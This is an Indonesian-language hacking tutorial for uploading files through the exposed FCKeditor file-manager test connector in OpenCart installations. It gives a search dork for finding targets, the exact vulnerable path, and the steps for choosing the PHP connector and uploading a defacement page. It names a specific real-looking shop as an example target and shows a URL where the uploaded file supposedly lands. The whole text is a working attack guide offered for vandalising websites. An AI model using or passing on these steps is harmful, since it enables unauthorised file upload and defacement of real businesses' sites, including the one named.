Remot File Upload Opencart

Dork : Powered By OpenCart site:com


"SITE :" terserah, yang penting support opencart


ex target: http://www.harleypartsintl.com/

bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya

ex: http://www.target.com/patch/


nah kalo dh dpt trget, lngsung aj kita inject exploitnya


For exploit : admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


jdi nya gni

ex: http://www.harleypartsintl.com/admin/vie.../test.html


kalo target yang ad /patch/ , inject nya d belakang patch nya

ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


liat yg kluar, dstu trdpat tmpat upload file nya.....

connector pilih PHP

lngsung aja kita upload file html deface kita...

jika berhasil mka akan kluar alert sprti ini

"file uploaded with no errors"

liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"


skrng liat hasilnya....


ex hasil: http://www.harleypartsintl.com/h-n.html


sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..